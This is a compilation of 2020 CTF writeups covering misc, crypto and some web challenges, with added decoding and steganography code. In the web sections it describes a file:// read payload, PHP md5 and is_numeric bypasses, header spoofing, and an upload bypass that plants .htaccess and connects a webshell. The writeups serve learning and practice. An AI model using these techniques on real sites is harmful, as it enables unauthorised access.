
2020CTF WP


2020RoarCTF Misc Writeup

Sign-in

"The sign-in is harder than what follows" series.jpg

?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37

Hi_433MHz

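I really was a blockhead here: I didn't read the software's prompt. I should go crawl away.

Dragging the file straight into Audacity brings up the prompt below.

Importing the file the way the prompt says, the long and short pulses are clearly visible. Each group has nine bits, so it is not Morse code: eight bits are binary data and the last bit should be a parity bit.

Transcribing it by hand gives:
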
01100110
01101100
01100001
01100111
01111011
00110010
00110101
01100011
00110010
00110001
01100010
00110000
01100100
00101101
00110110
01100001
00110001
00110001
00101101
00110100
00110011
00110001
00110010
00101101
00111001
00110111
00110001
01100010
00101101
00110100
00110010
00111000
01100100
00110000
00110001
01100011
01100100
01100011
00110101
00110011
00110100
01111101
flag{25c21b0d-6a11-4312-971b-428d01cdc534}
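
The parity bit is also a check on the hand transcription: a frame whose parity fails was copied wrongly. The decoder below is an added example, not part of the original post; it assumes even parity with the parity bit last (the post does not say which convention the signal uses), and the sample frames are constructed from the first five bytes listed above.

```python
# Added example (not from the original post). Assumes the ninth bit of each
# group is an even-parity bit; the sample frames below are constructed.

def decode_frames(bits, parity="even"):
    """Decode 9-bit frames (8 data bits + 1 parity bit) into text.

    Returns (text, bad_frames); bad_frames lists the indexes of frames whose
    parity does not check out, for example after a transcription slip.
    """
    bits = "".join(ch for ch in bits if ch in "01")   # ignore spaces/newlines
    if len(bits) % 9:
        raise ValueError("bit count %d is not a multiple of 9" % len(bits))
    want = 0 if parity == "even" else 1
    text, bad = [], []
    for n in range(len(bits) // 9):
        frame = bits[9 * n: 9 * n + 9]
        if frame.count("1") % 2 != want:
            bad.append(n)
        text.append(chr(int(frame[:8], 2)))
    return "".join(text), bad


def guess_parity(bits):
    """Pick the convention (even or odd) that leaves the fewest failing frames."""
    return min(("even", "odd"), key=lambda p: len(decode_frames(bits, p)[1]))


# Constructed sample: the bytes for "flag{" with an even-parity bit appended.
SAMPLE = "011001100 011011000 011000011 011001111 011110110"
# The same frames with one bit of the third frame mis-transcribed.
SLIPPED = "011001100 011011000 011000111 011001111 011110110"

if __name__ == "__main__":
    print(guess_parity(SAMPLE))
    print(decode_frames(SAMPLE))
    print(decode_frames(SLIPPED))
```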

FM

软件装了一天,比赛结束后才知道直接听,然而虚拟机声卡被我删了。

我铁憨憨了,四舍五入也算我ak吧球球了。

2020SWPUCTF Misc&Crypto Writeup

I got stuck on the 嘶哄 radio challenges, so I came over here to play around a bit.

Misc

套娃 (Matryoshka)

# RC4data.txt
U2FsdGVkX19uI2lzmxYrQ9mc16y7la7qc7VTS8gLaUKa49gzXPclxRXVsRJxWz/p

# Viewing the hex gives the archive password
6e4c834d77cba03af41e1562a5bce84e
# Extracting gives the RC4 key
ABCDEFGHIJKLMNOPQRSTUVWXYZ

# Decrypting online gives the flag
ef1a73d40977a49b99b871980f355757

耗子尾汁

A string of text visibly flashes past in the video.

# base64
c2lnbl9pbg==
# decodes to
sign_in

At the end of the video there is a zip; extracting it with the password above gives the following:

R1pCVE9OUlhHVTNES05SWkdZWVRNUVJYSEEzVEtOUlVHNFpUT09KWEdFM0RLTlJZRzRaVE9RSlhHRTNEUU5aWkdaQkRNTlpXRzQzVEdOWlpHNDRUTVFaV0lJM1RNTlpXR1k0UT09PT0=

//The last layer is the single table replacement password

Base64, then base32, then hex to string:

lvueiakxudsyqehszqhykggsyylkvvi
fladybuganeshdiephisuccessfully
flagyouhavesignedinsuccessfully
xxx_xxxx_xxxxxx_xx_xxxxxxxxxxxx

来找我吧 (Come Find Me)

key is PPPaAaS

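This gives findme.mp3 and secret.rar. Running file shows that findme.mp3 is actually RAR5; changing the extension and extracting gives 哈哈哈.png and 采茶纪.mp3. secret.rar is genuinely encrypted; a quick hashcat brute force turned up nothing, so the password has to be found elsewhere.

The start of the audio has something that sounds like dial tones.

At the end there is a stretch of Morse code.

Decoding gives D43963E92B012AAB, an MD5 that costs money to look up; the poor don't deserve it, sob. The hash comes out as n1ce_try. Extracting secret.rar gives a gif and a png; one frame of the gif is shown in the figure below.

The CRC of hint.png is wrong; after repairing it the hint reads: Veni,Vidi,Vici. Searching for this hint directly shows it points to Caesar.

The Caesar cipher gives flag{sWpu_N1c3_Try}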

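来猜谜吧 (Come Guess the Riddle)

We get probelm.png. zsteg extracts a zip from it; the zip has extra content appended at the end, and deleting that lets it extract normally. This gives uuu.pcap, a capture of mouse traffic, and mi.jpg.

# The mouse traffic, as shown in the figure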
AG<SPACE>DX<SPACE>AG<SPACE>DX<SPACE>AG<SPACE>DX

Decrypting directly against the ADFGX table gives gogogo

\ A D F G X
A p h q g m
D e a y n o
F f d x k r
G c v s z w
X b u t i l

Only the jpg is left now. For password-protected jpg steganography, my blind guess is outguess.

This gives flag{Out9uEsS_1s_V4rY_e4sy}

Crypto

happy

Sign-in RSA

from z3 import *
import gmpy2
from Crypto.Util.number import *
c=0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e
e=0x872a335
#q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
# q+q*p**3=
#qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
# q*p+q*p**2
# s = Solver()
# p = Int('p')
# q = Int('q')
# s.add(q+q*p**3==1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586)
# s.add(q*p+q*p**2==1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594)
# if s.check() == sat:
#     print(s.model())
q = 827089796345539312201480770649
p = 1158310153629932205401500375817
n=p*q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
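
The two hint values factor as q(1+p)(p²-p+1) and q·p·(1+p), and gcd(p²-p+1, p) = 1, so their gcd is exactly q(1+p) and no solver is needed. The script below is an added example, not the original author's code; it uses only the standard library, copies the four numbers from the script above, and the function names are mine.

```python
# Added example (not from the original post): recover p and q with a gcd.
from math import gcd

# Values copied from the challenge script above.
A = 1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586  # q + q*p**3
B = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594  # q*p + q*p**2
E = 0x872a335
C = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e


def recover_factors(a, b):
    """Solve a = q + q*p^3, b = q*p + q*p^2 for (p, q).

    a = q(1+p)(p^2-p+1) and b = q*p*(1+p); since gcd(p^2-p+1, p) = 1,
    gcd(a, b) = q(1+p), hence p = b / gcd and q = gcd / (p+1).
    """
    g = gcd(a, b)
    p, rem = divmod(b, g)
    if rem or g % (p + 1):
        raise ValueError("inputs do not have the expected shape")
    q = g // (p + 1)
    # Check the result against both original equations before trusting it.
    if q + q * p**3 != a or q * p + q * p**2 != b:
        raise ValueError("recovered values do not satisfy the equations")
    return p, q


def rsa_decrypt(c, e, p, q):
    """Textbook RSA decryption from the recovered factors (Python 3.8+)."""
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, p * q)


def int_to_bytes(m):
    """Big-endian bytes of a non-negative integer, like long_to_bytes."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    p, q = recover_factors(A, B)
    print("p =", p)
    print("q =", q)
    print(int_to_bytes(rsa_decrypt(C, E, p, q)))
```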

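2020 西湖论剑 (West Lake Sword Forum) Misc partial writeup

Calling this a writeup is generous; it is more a record of getting beaten up. I solved nothing and was thoroughly useless. I hope the experts who read this go easy on me.
I also hope some expert can give this junior a few pointers; contact details are on the home page.

Yusa_yyds

The official writeup says one vibration is four packets. I didn't know that, and didn't dare ask.

Filter out the Xbox traffic: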

usb.addr == "2.15.2"

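Straight to the picture: I marked the first packet after each time gap, which makes it obvious.

The 32-character lowercase MD5 of 114514 is the flag.

PS: a classmate has a controller; I'll try it out when I get the chance.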

Yusapapa

The page source contains a hint. Searching for Biometric list leads to the PGP word list; there is a decoder on GitHub, which gives the following:

You can see my collection puzzles in /hint.rar and another /encode.png.
By the way,the picture shoud be used 
"Yusa" is very important in this challenge!!

Later I also wrote my own script; the GitHub address is here, stars welcome.

cipher = """
endow gremlin indulge bison flatfoot fallout goldfish bison hockey fracture fracture bison goggles jawbone bison flatfoot gremlin glucose glucose fracture flatfoot indoors gazelle gremlin goldfish bison guidance indulge keyboard keyboard glucose fracture hockey bison gazelle goldfish bison cement frighten gazelle goldfish indoors buzzard highchair fallout highchair bison fallout goldfish flytrap bison fallout goldfish gremlin indoors frighten fracture highchair bison cement fracture goldfish flatfoot gremlin flytrap fracture buzzard guidance goldfish freedom buzzard allow crowfoot jawbone bison indoors frighten fracture bison involve fallout jawbone Burbank indoors frighten fracture bison guidance gazelle flatfoot indoors indulge highchair fracture bison hockey frighten gremlin indulge flytrap bison flagpole fracture bison indulge hockey fracture flytrap bison allow blockade endow indulge hockey fallout blockade bison gazelle hockey bison inverse fracture highchair jawbone bison gazelle goggles guidance gremlin highchair indoors fallout goldfish indoors bison gazelle goldfish bison indoors frighten gazelle hockey bison flatfoot frighten fallout glucose glucose fracture goldfish freedom fracture blackjack blackjack
"""
cipher = cipher.split()
odd_list = ['aardvark', 'absurd', 'accrue', 'acme', 'adrift', 'adult', 'afflict', 'ahead', 'aimless', 'Algol', 'allow', 'alone', 'ammo', 'ancient', 'apple', 'artist', 'assume', 'Athens', 'atlas', 'Aztec', 'baboon', 'backfield', 'backward', 'banjo', 'beaming', 'bedlamp', 'beehive', 'beeswax', 'befriend', 'Belfast', 'berserk', 'billiard', 'bison', 'blackjack', 'blockade', 'blowtorch', 'bluebird', 'bombast', 'bookshelf', 'brackish', 'breadline', 'breakup', 'brickyard', 'briefcase', 'Burbank', 'button', 'buzzard', 'cement', 'chairlift', 'chatter', 'checkup', 'chisel', 'choking', 'chopper', 'Christmas', 'clamshell', 'classic', 'classroom', 'cleanup', 'clockwork', 'cobra', 'commence', 'concert', 'cowbell', 'crackdown', 'cranky', 'crowfoot', 'crucial', 'crumpled', 'crusade', 'cubic', 'dashboard', 'deadbolt', 'deckhand', 'dogsled', 'dragnet', 'drainage', 'dreadful', 'drifter', 'dropper', 'drumbeat', 'drunken', 'Dupont', 'dwelling', 'eating', 'edict', 'egghead', 'eightball', 'endorse', 'endow', 'enlist', 'erase', 'escape', 'exceed', 'eyeglass', 'eyetooth', 'facial', 'fallout', 'flagpole', 'flatfoot', 'flytrap', 'fracture', 'framework', 'freedom', 'frighten', 'gazelle', 'Geiger', 'glitter', 'glucose', 'goggles', 'goldfish', 'gremlin', 'guidance', 'hamlet', 'highchair', 'hockey', 'indoors', 'indulge', 'inverse', 'involve', 'island', 'jawbone', 'keyboard', 'kickoff', 'kiwi', 'klaxon', 'locale', 'lockup', 'merit', 'minnow', 'miser', 'Mohawk', 'mural', 'music', 'necklace', 'Neptune', 'newborn', 'nightbird', 'Oakland', 'obtuse', 'offload', 'optic', 'orca', 'payday', 'peachy', 'pheasant', 'physique', 'playhouse', 'Pluto', 'preclude', 'prefer', 'preshrunk', 'printer', 'prowler', 'pupil', 'puppy', 'python', 'quadrant', 'quiver', 'quota', 'ragtime', 'ratchet', 'rebirth', 'reform', 'regain', 'reindeer', 'rematch', 'repay', 'retouch', 'revenge', 'reward', 'rhythm', 'ribcage', 'ringbolt', 'robust', 'rocker', 'ruffled', 'sailboat', 'sawdust', 'scallion', 'scenic', 'scorecard', 
'Scotland', 'seabird', 'select', 'sentence', 'shadow', 'shamrock', 'showgirl', 'skullcap', 'skydive', 'slingshot', 'slowdown', 'snapline', 'snapshot', 'snowcap', 'snowslide', 'solo', 'southward', 'soybean', 'spaniel', 'spearhead', 'spellbind', 'spheroid', 'spigot', 'spindle', 'spyglass', 'stagehand', 'stagnate', 'stairway', 'standard', 'stapler', 'steamship', 'sterling', 'stockman', 'stopwatch', 'stormy', 'sugar', 'surmount', 'suspense', 'sweatband', 'swelter', 'tactics', 'talon', 'tapeworm', 'tempest', 'tiger', 'tissue', 'tonic', 'topmost', 'tracker', 'transit', 'trauma', 'treadmill', 'Trojan', 'trouble', 'tumor', 'tunnel', 'tycoon', 'uncut', 'unearth', 'unwind', 'uproot', 'upset', 'upshot', 'vapor', 'village', 'virus', 'Vulcan', 'waffle', 'wallet', 'watchword', 'wayside', 'willow', 'woodlark', 'Zulu']
even_list = ['adroitness', 'adviser', 'aftermath', 'aggregate', 'alkali', 'almighty', 'amulet', 'amusement', 'antenna', 'applicant', 'Apollo', 'armistice', 'article', 'asteroid', 'Atlantic', 'atmosphere', 'autopsy', 'Babylon', 'backwater', 'barbecue', 'belowground', 'bifocals', 'bodyguard', 'bookseller', 'borderline', 'bottomless', 'Bradbury', 'bravado', 'Brazilian', 'breakaway', 'Burlington', 'businessman', 'butterfat', 'Camelot', 'candidate', 'cannonball', 'Capricorn', 'caravan', 'caretaker', 'celebrate', 'cellulose', 'certify', 'chambermaid', 'Cherokee', 'Chicago', 'clergyman', 'coherence', 'combustion', 'commando', 'company', 'component', 'concurrent', 'confidence', 'conformist', 'congregate', 'consensus', 'consulting', 'corporate', 'corrosion', 'councilman', 'crossover', 'crucifix', 'cumbersome', 'customer', 'Dakota', 'decadence', 'December', 'decimal', 'designing', 'detector', 'detergent', 'determine', 'dictator', 'dinosaur', 'direction', 'disable', 'disbelief', 'disruptive', 'distortion', 'document', 'embezzle', 'enchanting', 'enrollment', 'enterprise', 'equation', 'equipment', 'escapade', 'Eskimo', 'everyday', 'examine', 'existence', 'exodus', 'fascinate', 'filament', 'finicky', 'forever', 'fortitude', 'frequency', 'gadgetry', 'Galveston', 'getaway', 'glossary', 'gossamer', 'graduate', 'gravity', 'guitarist', 'hamburger', 'Hamilton', 'handiwork', 'hazardous', 'headwaters', 'hemisphere', 'hesitate', 'hideaway', 'holiness', 'hurricane', 'hydraulic', 'impartial', 'impetus', 'inception', 'indigo', 'inertia', 'infancy', 'inferno', 'informant', 'insincere', 'insurgent', 'integrate', 'intention', 'inventive', 'Istanbul', 'Jamaica', 'Jupiter', 'leprosy', 'letterhead', 'liberty', 'maritime', 'matchmaker', 'maverick', 'Medusa', 'megaton', 'microscope', 'microwave', 'midsummer', 'millionaire', 'miracle', 'misnomer', 'molasses', 'molecule', 'Montana', 'monument', 'mosquito', 'narrative', 'nebula', 'newsletter', 'Norwegian', 'October', 'Ohio', 'onlooker', 'opulent', 
'Orlando', 'outfielder', 'Pacific', 'pandemic', 'Pandora', 'paperweight', 'paragon', 'paragraph', 'paramount', 'passenger', 'pedigree', 'Pegasus', 'penetrate', 'perceptive', 'performance', 'pharmacy', 'phonetic', 'photograph', 'pioneer', 'pocketful', 'politeness', 'positive', 'potato', 'processor', 'provincial', 'proximate', 'puberty', 'publisher', 'pyramid', 'quantity', 'racketeer', 'rebellion', 'recipe', 'recover', 'repellent', 'replica', 'reproduce', 'resistor', 'responsive', 'retraction', 'retrieval', 'retrospect', 'revenue', 'revival', 'revolver', 'sandalwood', 'sardonic', 'Saturday', 'savagery', 'scavenger', 'sensation', 'sociable', 'souvenir', 'specialist', 'speculate', 'stethoscope', 'stupendous', 'supportive', 'surrender', 'suspicious', 'sympathy', 'tambourine', 'telephone', 'therapist', 'tobacco', 'tolerance', 'tomorrow', 'torpedo', 'tradition', 'travesty', 'trombonist', 'truncated', 'typewriter', 'ultimate', 'undaunted', 'underfoot', 'unicorn', 'unify', 'universe', 'unravel', 'upcoming', 'vacancy', 'vagabond', 'vertigo', 'Virginia', 'visitor', 'vocalist', 'voyager', 'warranty', 'Waterloo', 'whimsical', 'Wichita', 'Wilmington', 'Wyoming', 'yesteryear', 'Yucatan']

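# Map every word to its byte value: the index in whichever list contains it.
word_to_byte = {word: idx for idx, word in enumerate(odd_list)}
word_to_byte.update({word: idx for idx, word in enumerate(even_list)})

# Decode word by word; a word found in neither list is printed unchanged.
for word in cipher:
    if word in word_to_byte:
        print(chr(word_to_byte[word]), end='')
    else:
        print(word, end='')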

Found a project called stegpy on GitHub.

pip3 install stegpy
$ stegpy.exe encode.webp
the_password_is:Yus@_1s_YYddddsstegpy encode.webp the_key_is:Yus@_yydsstegpy!!

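That gives two passwords. I tried both; the second one decrypts hint.rar, giving hint.jpg.

The organisers released a hint, "invisible"; otherwise I would have started swearing. It is Invisible Secrets steganography; I downloaded a very old piece of software from 华军...

The page source says "Yusa" is very important in this challenge. Decrypt with "Yusa", choosing the last encryption algorithm in the list, to get the encode script.

A quick analysis: it generates two random keystreams and XORs them with each pixel of flag.png, then uses LSB embedding to put flag.png into the pixels of source.png. Stream 1 is stored in the R channel, stream 2 in the G channel, and enc is written to the B channel.

To decrypt, take the last bit of each channel and XOR them back together to get the flag.
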
from PIL import Image
en_p = Image.open('./encode.png').convert('RGB')
a,b = en_p.size
R=[]
G=[]
B=[]
key1stream = []
key2stream = []
enc = []
flag = []

for x in range(a):
    for y in range(b):
        tmp = en_p.getpixel((x,y)) 
        R.append(tmp[0])
        G.append(tmp[1])
        B.append(tmp[2])

# Extract the LSB data
for i in range(len(R)):
    if bin(R[i])[-1] == '1':
        key1stream.append(1)
    else:
        key1stream.append(0)

    if bin(G[i])[-1] == '1':
        key2stream.append(1)
    else:
        key2stream.append(0)

    if bin(B[i])[-1] == '1':
        enc.append(1)
    else:
        enc.append(0)

# Recover the flag
for i in range(len(enc)):
    flag.append(enc[i]^key1stream[i]^key2stream[i])

# Draw the result as a simple black-and-white image
img = Image.new('RGB',(a,b),(255,255,255))
for x in range(a):
    for y in range(b):
        if flag[y+x*b] == 0:
            img.putpixel((x,y),(0,0,0))
        else:
            img.putpixel((x,y),(255,255,255))
img.save('flag.png')
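
Why XORing the three LSBs is enough: the B channel holds flag ^ k1 ^ k2 while R and G hold k1 and k2 themselves, so the key material ships inside the image. The round trip below is an added example, not the challenge's encode script (which the post does not reproduce); the embedding side is reconstructed from the description above, pixels are plain (R, G, B) tuples so no imaging library is needed, and the cover pixels, bit pattern and seed parameter are constructed.

```python
# Added example (not from the original post). embed() is reconstructed from
# the prose description of the encode script; names and data are constructed.
import random


def embed(cover, flag_bits, seed=0):
    """Hide one flag bit per pixel in the channel LSBs.

    R LSB <- keystream 1, G LSB <- keystream 2, B LSB <- flag ^ k1 ^ k2.
    `seed` is a hypothetical parameter used only to make runs repeatable.
    """
    if len(cover) != len(flag_bits):
        raise ValueError("need exactly one flag bit per cover pixel")
    rng = random.Random(seed)
    stego = []
    for (r, g, b), bit in zip(cover, flag_bits):
        k1, k2 = rng.getrandbits(1), rng.getrandbits(1)
        enc = bit ^ k1 ^ k2
        # Clear each LSB, then write the new bit into it.
        stego.append(((r & ~1) | k1, (g & ~1) | k2, (b & ~1) | enc))
    return stego


def extract(stego):
    """Recover the flag bits: (k1 ^ k2 ^ enc) is the XOR of the three LSBs."""
    return [(r ^ g ^ b) & 1 for r, g, b in stego]


def max_channel_change(cover, stego):
    """Largest per-channel difference introduced by embedding (at most 1)."""
    return max(abs(a - b) for p, s in zip(cover, stego) for a, b in zip(p, s))


# Constructed 16-pixel cover image and a constructed 16-bit "flag" pattern.
COVER = [((10 * i) % 256, (37 * i + 5) % 256, (91 * i + 200) % 256)
         for i in range(16)]
FLAG_BITS = [1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1]

if __name__ == "__main__":
    stego = embed(COVER, FLAG_BITS, seed=2020)
    print(extract(stego) == FLAG_BITS, max_channel_change(COVER, stego))
```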

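指鹿为马 (Calling a Deer a Horse)

CNN. I'll keep crawling away.
Supposedly a bit of Photoshop also works; it did not work for me, sob.

Use OpenCV to change the opacity and blend the two images:
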
import cv2 as cv
alpha = 0.5
horse = cv.imread('horse.png')
deer = cv.imread('deer.png')
dst = cv.addWeighted(horse, alpha, deer, 0.4, 0.0)
cv.imwrite('image.png', dst)

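By the time I reproduced this the target machine had been shut down; a locally modified version runs and gives the result.

import base64
import os
import random

import numpy as np

# load_horse, load_deer, load_test, getNeighbors and getResponse come from the
# challenge script and are not reproduced in this post.
def main():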
    while 1:
        pic = base64.b64encode(open('./image.png', "rb").read())
        try:
            pic = base64.b64decode(pic)
        except:
            exit()
        if b"<?php" in pic or b'eval' in pic:
            print("Hacker!!This is not WEB,It`s Just a misc!!!")
            exit()
        salt = str(random.getrandbits(15))
        pic_name = 'tmp_'+salt+'.png'
        tmp_pic = open(pic_name,'wb')
        tmp_pic.write(pic)
        tmp_pic.close()
        ma = load_horse()
        lu = load_deer()
        k = 1
        trainingSet = np.append(ma, lu).reshape(2, 5185)
        testSet = load_test(pic_name)
        neighbors = getNeighbors(trainingSet, testSet[0], k)
        result = getResponse(neighbors)
        if repr(result) == '0':
            print('Yes,I want this horse like deer,here is your flag encoded by base64')
            flag = base64.b64encode(open('flag','rb').read())
            print(flag.decode())
            os.remove(pic_name)
            break
        else:
            print('I want horse but not deer!!!')
            os.remove(pic_name)
            break
    exit()

Barbar

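The attachment is an enormous QR code. Scanning it with CQR shows a string of question marks, while scanning with WeChat shows none; my first reaction was zero-width characters.

But the first site I found decoded it incorrectly and gave a wrong result, after which the whole challenge went nowhere. In the end I found a site that decodes it correctly... wsfw (I am useless), no doubt about it.
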
False:ntentteanetekettterieeenaeatttedtttt
True:YcfVgMBUraXftwO6Cp92YBGAbyRyWNOO

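Extracting gives a damaged QR code and a docx. Repairing the QR code and scanning it gives this. Damn it!

Drop the docx into Kali; document.xml contains a base64 string.

Remove the characters in the middle and decode it to get an Aztec Code.

It can be decoded online into something that looks like a flag: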

di`f{e1c64e14db14c6bb8faabab5bd7be1dc}

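There was no follow-up from here; the only thing I noticed was that the challenge hint had not been used: there is an unusual connection between bar and bar

I suspect there is still something in that repaired QR code.

OK, the official writeup is out and I am useless: the flag comes out with npiet.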

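1st 太湖杯 (Taihu Cup) Misc solutions

memory

Sign-in challenge

Ask the Windows dynamic-link library manager; he will tell you the answer

Original challenge download: https://pan.baidu.com/s/1tmM-wjyMZ_SHdDJ82Qaq7A (3qci)
Password for the challenge archive distributed in advance: welc0me_to_Asuri_w0rld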

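The hint felt misleading: it points at DLLs, but listing them showed nothing. So I went off and did the web sign-in challenge, took a rough look at the other two misc challenges, and then came back to this one.

# iehistory shows Desktop/Untitled.png on the desktop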
volatility -f dump --profile=Win7SP1x86 iehistory
# use filescan to find its address
volatility -f dump --profile=Win7SP1x86 filescan | grep "Untitled.png"
# dump the image with dumpfiles; the flag is inside it
volatility -f dump --profile=Win7SP1x86 dumpfiles -Q 0x000000003fdf6118 -D ./

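Taking first blood felt pretty sweet.

misc

This was the most painful challenge of all; it really was not well made.

We get a zip. Extracting it gives fun.zip, and undoing the pseudo-encryption also gives omisc.docx.

The docx contains two lines of hidden text:
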
waoootu.epj,nv o
www.verymuch.net

Nobody solved it for a long time, until a hint said it was a Hill cipher; an online tool gives:

love and peaceee

Rabbit decryption gives

Base32 decoding gives

b'\\u65b0\\u4f5b\\u66f0\\uff1a\\u8af8\\u96b8\\u54c9\\u50e7\\u964d\\u543d\\u8af8\\u9640\\u6469\\u96b8\\u50e7\\u7f3d\\u85a9\\u54a4\\u8028\\u8af8\\u96b8\\u6167\\u585e\\u8272\\u5c0a\\u54c9\\u8fe6\\u8ae6\\u7a7a\\u6240\\u964d\\u6211\\u5ff5\\u96b8\\u7957\\u8ae6\\u5ff5\\u54c9\\u9640\\u56b4\\u54c9\\u56c9\\u4fee\\u5937\\u963f\\u6ce2\\u8272\\u838a\\u5bc2\\u8ae6\\u585e\\u5492\\u838a\\u773e\\u6211\\u54c9\\u6240\\u4f0f\\u805e\\u85a9\\u96b8\\u610d\\u95cd\\u5436\\u6240\\u4fee\\u662f\\u8272\\u6469\\u8a36\\u56b4\\u54c9\\u9858\\u610d\\u54c9\\u5373\\u4fee\\u54c9\\u7a7a\\u871c\\u9640\\u56c9\\u4f0f\\u5ff5\\u54c9\\u6469\\u54c9\\u4ea6\\u838a\\u54c9\\u773e\\u54a4\\u5982\\u9858\\u5982'

Unicode decoding gives

新佛曰:諸隸哉僧降吽諸陀摩隸僧缽薩咤耨諸隸慧塞色尊哉迦諦空所降我念隸祗諦念哉陀嚴哉囉修夷阿波色莊寂諦塞咒莊眾我哉所伏聞薩隸愍闍吶所修是色摩訶嚴哉願愍哉即修哉空蜜陀囉伏念哉摩哉亦莊哉眾咤如願如

Decoding with 新佛曰 (the "New Buddha says" encoder) gives

Live beautifully, dream passionately, love completely.

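Decrypt the earlier zip to get an audio file; its spectrogram is the flag.

broken_secret

A hint was given: the information on the picture is very important

In the end this challenge had only four solves, and I did not solve it.

Extracting gives a PDF that will not open. Inside it the o of obj had been replaced with @; changing it back lets the file open normally. There is a fake flag, and there also seem to be two streams that are not parsed. I could not get any further.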

2020MRCTF writeup

ez_bypass

<?php
// Page output: I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
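// Page output: Please input first

A quick read of the source: two checks have to be passed, an md5 bypass (md5($id) === md5($gg) while $id !== $gg) and an is_numeric bypass (passwd must fail is_numeric yet satisfy the loose comparison == 1234567).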

你传你🐎呢

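After some attempts it turns out only images can be uploaded, and after uploading an image I could not connect to it.

I tried uploading other file types but none of them worked, so I considered using .htaccess to allow the upload.

But .htaccess cannot be uploaded directly either. Upload an image, intercept the request and change it to .htaccess.

Finally upload another image renamed to ma.ma, and the upload succeeds. Get AntSword (蚁剑) ready.

Sometimes the connection succeeds and sometimes it throws errors like crazy; once connected it is also very, very slow...

In the end the flag turned out to be in the root directory.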

# upload.php, visible after connecting
<?php
session_start();
echo "
<meta charset=\"utf-8\">";
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("我扌your problem?");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uploaded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
			mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
			move_uploaded_file($uploaded_tmp, $t_path);
			echo "{$t_path} succesfully uploaded!";
        }
        else{
            die("我扌your problem?");
        }
    }
}
?>
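
The filter in upload.php blocks only extensions containing "ph" and trusts the MIME type sent by the client, which is why the .htaccess and ma.ma uploads described above get through. The comparison below is an added example, not code from the challenge: original_check is a Python port of that decision logic (the one MIME value that is garbled in the listing is left out), hardened_check is one possible allowlist replacement, and all file names and contents are constructed placeholders.

```python
# Added example (not from the original post): the page's blocklist next to an
# allowlist. File names and byte strings below are constructed placeholders.
import hashlib
import os
import re

CLIENT_TYPES = {"image/jpeg", "image/pjpeg", "image/png"}


def original_check(name, client_type, size):
    """Port of upload.php: extension must not contain 'ph', client MIME must
    be an image type, size must be under 2048 bytes."""
    dot = name.rfind(".")
    ext = name[dot + 1:] if dot >= 0 else name[1:]  # substr(name, strrpos + 1)
    if re.search(r"ph", ext, re.I):
        return False
    return client_type in CLIENT_TYPES and size < 2048


# Allowed extensions and the file signature each one must start with.
SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def hardened_check(name, data, max_size=2048):
    """Allowlist the extension, reject dotfiles, verify the content signature.
    The client-supplied MIME type is not consulted at all."""
    base = os.path.basename(name).lower()
    if base.startswith("."):              # .htaccess and other dotfiles
        return False
    stem, ext = os.path.splitext(base)
    signature = SIGNATURES.get(ext)
    if not stem or signature is None or len(data) >= max_size:
        return False
    return data.startswith(signature)


def stored_name(data, ext):
    """Server-chosen name, so the uploader never controls the stored path."""
    return hashlib.sha256(data).hexdigest()[:32] + ext


PNG_BYTES = SIGNATURES[".png"] + b"constructed-image-body"
TEXT_BYTES = b"constructed placeholder, not an image"

if __name__ == "__main__":
    for name, data in ((".htaccess", TEXT_BYTES), ("ma.ma", TEXT_BYTES),
                       ("cat.png", PNG_BYTES)):
        print(name, original_check(name, "image/png", len(data)),
              hardened_check(name, data))
```

Serving the upload directory with Apache's AllowOverride None additionally stops any uploaded .htaccess from being honoured.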

PYwebsite

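At first glance I thought the challenge was a website written in Python; it turns out the challenge lets you pay for a "py" deal. Haha, kind of fun.

I actually stared at the home page for quite a while and found nothing...
Then I took a look at Target and my eyes lit up.

The captured traffic says that he himself can obtain it; clearly an XFF check.

Change the XFF header and the flag is easily obtained.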

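套娃 (Matryoshka)

Just nesting dolls, really...

# Layer 1
# payload: http://5772a629-7e5b-45aa-9414-ce874dd6d4ab.merak-ctf.site/?b.u.p.t=23333%0a
# PHP's parameter parsing turns . into _
# Some people say only %0f is filtered here and that %0F also gets past it, but it did not work when I tried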
<?php
